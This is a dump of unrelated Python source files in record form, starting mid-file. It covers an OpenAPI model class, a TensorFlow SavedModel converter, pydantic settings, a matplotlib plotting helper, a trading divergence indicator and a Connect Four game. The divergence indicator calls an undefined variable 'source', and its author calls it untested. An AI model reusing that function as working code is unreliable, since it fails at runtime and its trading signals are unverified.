arguments=%s passed to %s. Remove those invalid positional arguments.\" % (\n args,\n self.__class__.__name__,\n ),\n path_to_item=_path_to_item,\n valid_classes=(self.__class__,),\n )\n\n self._data_store = {}\n self._check_type = _check_type\n self._spec_property_naming = _spec_property_naming\n self._path_to_item = _path_to_item\n self._configuration = _configuration\n self._visited_composed_classes = _visited_composed_classes + (self.__class__,)\n\n self.attributes = attributes\n self.id = id\n self.type = type\n for var_name, var_value in kwargs.items():\n if var_name not in self.attribute_map and \\\n self._configuration is not None and \\\n self._configuration.discard_unknown_keys and \\\n self.additional_properties_type is None:\n # discard variable.\n continue\n setattr(self, var_name, var_value)\n if var_name in self.read_only_vars:\n raise ApiAttributeError(f\"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate \"\n f\"class with read only attributes.\")\n"} {"ext": "py", "sha": "1a314d37754d75b258b2bd144ecbd45e4d9d7b60", "content": "import tensorflow as tf\nimport os\nimport shutil\nfrom tensorflow.python.saved_model import tag_constants\nfrom tensorflow.python import ops\n\ndef get_graph_def_from_file(graph_filepath):\n tf.compat.v1.reset_default_graph()\n with ops.Graph().as_default():\n with tf.compat.v1.gfile.GFile(graph_filepath, 'rb') as f:\n graph_def = tf.compat.v1.GraphDef()\n graph_def.ParseFromString(f.read())\n return graph_def\n\ndef convert_graph_def_to_saved_model(export_dir, graph_filepath, input_name, outputs):\n graph_def = get_graph_def_from_file(graph_filepath)\n with tf.compat.v1.Session(graph=tf.Graph()) as session:\n tf.import_graph_def(graph_def, name='')\n tf.compat.v1.saved_model.simple_save(\n session,\n export_dir,# change input_image to node.name if you know the name\n inputs={input_name: session.graph.get_tensor_by_name('{}:0'.format(node.name))\n for node in graph_def.node if node.op=='Placeholder'},\n outputs={t.rstrip(\":0\"):session.graph.get_tensor_by_name(t) for t in outputs}\n )\n print('Optimized graph converted to SavedModel!')\n\ntf.compat.v1.enable_eager_execution()\n\n# convert this to a TF Serving compatible mode\nshutil.rmtree('./saved_model', ignore_errors=True)\nconvert_graph_def_to_saved_model('./saved_model', './v3-large_224_1.0_float.pb', 'input', ['MobilenetV3/Predictions/Softmax:0'])\n"} {"ext": "py", "sha": "1a314e28488f9b07a7c7751d6a0cd3b1d438f780", "content": "\"\"\"\nContains settings used elsewhere in the library.\n\"\"\"\n\nfrom typing import Literal\nfrom pathlib import Path\nfrom pydantic import BaseSettings, DirectoryPath, FilePath\nfrom dotenv import load_dotenv, find_dotenv\n\n# find the first file named \".env\" in the current directory or a parent directory\nload_dotenv(dotenv_path=find_dotenv(filename='.env'))\n\nENCOMP_BASE = Path(__file__).parent.resolve()\n\n\nclass Settings(BaseSettings):\n \"\"\"\n Settings class.\n\n Use an ``.env``-file to override the defaults.\n The ``.env``-file is located using ``dotenv.find_dotenv(filename='.env')``, this will find a\n file in the directory of the running Python process or in a parent directory.\n\n The variables in the ``.env``-file have the same names (not case-sensitive)\n as the attributes of this class, with the additional prefix ``ENCOMP_``.\n In case of invalid values in the ``.env``-file or environment variables,\n a ``ValidationError`` is raised.\n\n .. note::\n\n Names that are defined as global environment variables (either on the system\n or user level) take precedence over names in the ``.env``-file.\n The global environment variables are loaded even if no ``.env``-file was found.\n\n * ``DATA_DIRECTORY``: path to a directory with auxiliary data\n * ``ADDITIONAL_UNITS``: path to a file with additional unit definitions for ``pint``\n * ``TYPE_CHECKING``: whether to check parameter and return value types of the core\n library function. This does not impact user-defined functions, the\n ``typeguard.typechecked`` decorator must be used explicitly\n * ``TYPESET_SYMBOL_SCRIPTS``: whether to typeset Sympy symbol sub- and superscripts\n * ``IGNORE_NDARRAY_UNIT_STRIPPED_WARNING``: whether to suppress the ``pint`` warning\n when converting Quantity to Numpy array.\n * ``MATPLOTLIB_NOTEBOOK_FORMAT``: figure format for Matplotlib figures in Jupyter Notebooks\n * ``AUTOCONVERT_OFFSET_TO_BASEUNIT``: whether to automatically convert offset units in calculations. If this is False, °C must be converted to K before multiplication (for example)\n * ``DEFAULT_UNIT_FORMAT``: default unit format for ``Quantity`` objects: one of ``~P`` (compact), ``~L`` (Latex), ``~H`` (HTML), ``~Lx`` (Latex with SIUNITX package)\n\n .. note::\n All names are case-insensitive.\n\n \"\"\"\n\n data_directory: DirectoryPath = ENCOMP_BASE / 'data'\n additional_units: FilePath = data_directory / 'additional-units.txt'\n\n type_checking: bool = False\n typeset_symbol_scripts: bool = True\n ignore_ndarray_unit_stripped_warning: bool = True\n\n matplotlib_notebook_format: Literal['retina', 'png', 'svg'] = 'retina'\n autoconvert_offset_to_baseunit: bool = True\n default_unit_format: Literal['~P', '~L', '~H', '~Lx'] = '~P'\n\n class Config:\n env_prefix = 'ENCOMP_'\n env_file = '.env'\n env_file_encoding = 'utf-8'\n case_sensitive = False\n\n\n# the settings object is initialized the first time the library loads\n# settings can be changed during runtime by setting attributes on this instance\nSETTINGS = Settings()\n"} {"ext": "py", "sha": "1a314e5da8e0a761183714313da99566115a9b63", "content": "# -*- coding: utf-8 -*-\n\nfrom matplotlib.patches import Patch\nfrom matplotlib.pyplot import axis, legend\n\nfrom ....Functions.init_fig import init_fig\nfrom ....definitions import config_dict\n\nMAGNET_COLOR = config_dict[\"PLOT\"][\"COLOR_DICT\"][\"MAGNET_COLOR\"]\n\n\ndef plot(self, fig=None, display_magnet=True):\n \"\"\"Plot the Hole in a matplotlib fig\n\n Parameters\n ----------\n self : Hole\n A Hole object\n fig :\n if None, open a new fig and plot, else add to the current\n one (Default value = None)\n display_magnet : bool\n if True, plot the magnet inside the hole, if there is any (Default value = True)\n\n Returns\n -------\n None\n \"\"\"\n display = fig is None\n if display:\n color = \"k\"\n else:\n color = \"w\"\n\n surf_hole = self.build_geometry()\n patches = list()\n for surf in surf_hole:\n if \"Magnet\" in surf.label and display_magnet:\n patches.extend(surf.get_patches(color=MAGNET_COLOR))\n else:\n patches.extend(surf.get_patches(color=color))\n\n # Display the result\n (fig, axes, patch_leg, label_leg) = init_fig(fig)\n axes.set_xlabel(\"(m)\")\n axes.set_ylabel(\"(m)\")\n axes.set_title(\"Hole\")\n\n # Add all the hole (and magnet) to fig\n for patch in patches:\n axes.add_patch(patch)\n\n # Axis Setup\n axis(\"equal\")\n Lim = self.get_Rbo() * 1.2\n axes.set_xlim(-Lim, Lim)\n axes.set_ylim(-Lim, Lim)\n\n if display_magnet and \"Magnet\" in [surf.label for surf in surf_hole]:\n patch_leg.append(Patch(color=MAGNET_COLOR))\n label_leg.append(\"Magnet\")\n legend(patch_leg, label_leg)\n fig.show()\n"} {"ext": "py", "sha": "1a314ed7e98779b54d32d41ecc3dcb9d4a4be264", "content": "from jesse.helpers import get_candle_source, slice_candles, np_shift, same_length\nimport numpy as np\nfrom numba import njit,jit\nimport talib \nfrom typing import Union\nfrom jesse.helpers import get_config\nfrom collections import namedtuple\nimport tulipy as ti\nimport math \n\n\"\"\"\nhttps://www.tradingview.com/script/sxZRzQzQ-Divergence-Indicator-any-oscillator/#chart-view-comment-form\nPossibly Accurate, needs more testing\n\"\"\"\n#jesse backtest '2021-01-03' '2021-03-02'\n\nDIVERGENCES = namedtuple('Divergences',['bearCond', 'bullCond', 'hiddenBullCond','hiddenBearCond'])\n\ndef divergence(candles: np.ndarray, lbR:int=2, lbL:int=2, rangeUpper:int=200, rangeLower:int=0,source_type: str = \"close\", sequential: bool = False) -> DIVERGENCES:\n candles = slice_candles(candles, sequential) \n source1 = get_candle_source(candles, source_type=source_type) \n bearCond, bullCond, hiddenBullCond, hiddenBearCond = fast_div(source,source,candles,lbR,lbL,rangeUpper,rangeLower)\n if sequential:\n return DIVERGENCES(bearCond,bullCond,hiddenBearCond,hiddenBullCond)\n else:\n return DIVERGENCES(bearCond[-1],bullCond[-1],hiddenBearCond[-1],hiddenBullCond[-1])\n \n \ndef fast_div(source1,source,candles,r,l,rangeUpper,rangeLower): \n highmiddlesource = np.full_like(source1,0)\n lowmiddlesource = np.full_like(source1,0)\n pivothigh = np.full_like(source1,0)\n pivotlow = np.full_like(source1,0)\n lastpivothighprice = np.full_like(source1,0)\n lastpivotlowprice = np.full_like(source1,0)\n priceslowest = np.full_like(source1,np.nan)\n priceshighest = np.full_like(source1,np.nan)\n priceshigh = np.full_like(source1,np.nan)\n priceslow = np.full_like(source1,np.nan)\n highindices = np.full_like(source1,np.nan)\n lowindices = np.full_like(source1,np.nan)\n ivar = np.full_like(source1,0)\n for i in range(source1.shape[0]):\n highmiddlesource[i] = source[i-r]\n lowmiddlesource[i] = source[i-l]\n if (np.all(highmiddlesource[i] >= source[i-(l+r):i-(r)]) and np.all(highmiddlesource[i] > source[i-(r-1):i+1])):\n pivothigh[i] = 1 \n lastpivothighprice[i] = highmiddlesource[i] \n else:\n pivothigh[i] = 0 \n lastpivothighprice[i] = lastpivothighprice[i-1]\n if (np.all(lowmiddlesource[i] <= source[i-(l+r):i-(r)]) and np.all(lowmiddlesource[i] < source[i-(r-1):i+1])): \n pivotlow[i] = 1 \n lastpivotlowprice[i] = lowmiddlesource[i] \n else:\n pivotlow[i] = 0 \n lastpivotlowprice[i] = lastpivotlowprice[i-1]\n if pivothigh[i] == 1:\n priceshigh[i] = source[i-r] \n priceshighest[i] = candles[:,3][i-r]\n highindices[i] = (i-r) \n if pivotlow[i] == 1:\n priceslow[i] = source[i-l] \n priceslowest[i] = candles[:,4][i-l]\n lowindices[i] = (i-l)\n ivar[i] = i\n ivar1 = int(ivar[-1])\n priceshigh = priceshigh[~np.isnan(priceshigh)]\n priceshigh = np.concatenate((np.full((source.shape[0] - priceshigh.shape[0]), np.nan), priceshigh)) \n priceshighest = priceshighest[~np.isnan(priceshighest)]\n priceshighest = np.concatenate((np.full((source.shape[0] - priceshighest.shape[0]), np.nan), priceshighest)) \n priceslow = priceslow[~np.isnan(priceslow)]\n priceslow = np.concatenate((np.full((source.shape[0] - priceslow.shape[0]), np.nan), priceslow)) \n priceslowest = priceslowest[~np.isnan(priceslowest)]\n priceslowest = np.concatenate((np.full((source.shape[0] - priceslowest.shape[0]), np.nan), priceslowest)) \n highindices = highindices[~np.isnan(highindices)]\n highindices = np.concatenate((np.full((source.shape[0] - highindices.shape[0]), np.nan), highindices)) \n lowindices = lowindices[~np.isnan(lowindices)]\n lowindices = np.concatenate((np.full((source.shape[0] - lowindices.shape[0]), np.nan), lowindices)) \n oscHL = 1 if source[-(r+1)] > priceslow[-2] and (np.abs(lowindices[-2]-ivar1) >= rangeLower and np.abs(lowindices[-2]-ivar1) <= rangeUpper) else 0 \n priceLL = 1 if candles[:,4][-(r+1)] < priceslowest[-2] else 0 \n bullCond = 1 if priceLL == 1 and oscHL == 1 and pivotlow[-1] == 1 else 0 \n oscLL = 1 if (source[-(r+1)] < priceslow[-2] and np.abs(lowindices[-2]-ivar1) >= rangeLower and np.abs(lowindices[-2]-ivar1) <= rangeUpper) else 0 \n priceHL = 1 if candles[:,4][-(r+1)] > priceslowest[-2] else 0 \n hiddenBullCond = 1 if priceHL == 1 and oscLL == 1 and pivotlow[-1] == 1 else 0 \n oscLH = 1 if source[-(r+1)] < priceshigh[-2] and (np.abs(highindices[-2]-ivar1) >= rangeLower and np.abs(highindices[-2]-ivar1) <= rangeUpper) else 0 \n priceHH = 1 if candles[:,3][-(r+1)] > priceshighest[-2] else 0 \n bearCond = 1 if priceHH == 1 and oscLH == 1 and pivothigh[-1] == 1 else 0 \n oscHH = 1 if source[-(r+1)] > priceshigh[-2] and (np.abs(highindices[-2]-ivar1) >= rangeLower and np.abs(highindices[-2]-ivar1) <= rangeUpper) else 0 \n priceLH = 1 if candles[:,3][-(r+1)] < priceshighest[-2] else 0 \n hiddenBearCond = 1 if priceLH == 1 and oscHH == 1 and pivothigh[-1] == 1 else 0 \n return bearCond, bullCond, hiddenBullCond, hiddenBearCond \n"} {"ext": "py", "sha": "1a314f29f5c821bd4517f8b3972bb56000ac2620", "content": "from enum import Enum\nfrom itertools import takewhile\n\nfrom grid import Grid, Point\n\nimport grid_utils\n\nclass DiscState(Enum):\n empty = 0\n red = 1\n black = 2\n\nclass Game(object):\n\n def __init__(self, initial_grid=None):\n self.restart(initial_grid)\n\n def restart(self, initial_grid=None):\n if initial_grid is None:\n self.grid = Grid(6, # Rows\n 7, # Cols\n initial_value=DiscState.empty)\n else:\n self.grid = initial_grid\n self.current_player = DiscState.red\n self.winner = None\n self.is_end = False\n\n def try_turn(self, color, col_index):\n added_point = self.try_move(color, col_index)\n if added_point is not None:\n winner = self.get_winner(added_point, self.current_player)\n if winner:\n self.winner = winner\n self.is_end = True\n return True\n else:\n if not self.is_board_full():\n self.switch_player()\n else:\n # Tie game\n self.is_end = True\n return True\n return False\n\n def try_move(self, color, col_index):\n if self.current_player is not color:\n return None\n if not self.can_add_disc(col_index):\n return None\n return self.add_disc(col_index, self.current_player)\n\n def switch_player(self):\n if self.current_player is DiscState.red:\n self.current_player = DiscState.black\n else:\n self.current_player = DiscState.red\n\n def is_board_full(self):\n for col_index in range(self.grid.width):\n if self.can_add_disc(col_index):\n return False\n return True\n\n def can_add_disc(self, col_index):\n if col_index >= self.grid.width:\n return False\n return self.grid[-1][col_index] is DiscState.empty\n\n def add_disc(self, col_index, color):\n for row_index in range(self.grid.height):\n if self.grid[row_index][col_index] is DiscState.empty:\n self.grid[row_index][col_index] = color\n return Point(row_index, col_index)\n break\n else:\n raise ValueError(\"column %i is full\" % col_index)\n\n def get_winner(self, last_move, current_player, row_size=4):\n assert self.grid.at(last_move) is not DiscState.empty\n if grid_utils.is_in_row_run(self.grid, last_move, row_size) or \\\n grid_utils.is_in_col_run(self.grid, last_move, row_size) or \\\n grid_utils.is_in_diag_down_run(self.grid, last_move, row_size) or \\\n grid_utils.is_in_diag_up_run(self.grid, last_move, row_size):\n return current_player\n return None\n\n def render_board(self):\n str_repr = [\"Current board state:\\n\"]\n str_repr += [\" %i \" % col_index for col_index in range(self.grid.width)] + [\"\\n\"]\n for row in reversed(self.grid):\n row_repr = []\n for disc_value in row:\n if disc_value is DiscState.empty:\n row_repr.append(\"| |\")\n elif disc_value is DiscState.red:\n row_repr.append(\"|O|\")\n else: # disc_value is black\n row_repr.append(\"|X|\")\n row_repr.append(\"\\n\")\n str_repr += row_repr\n print(\"\".join(str_repr))\n"}
    %s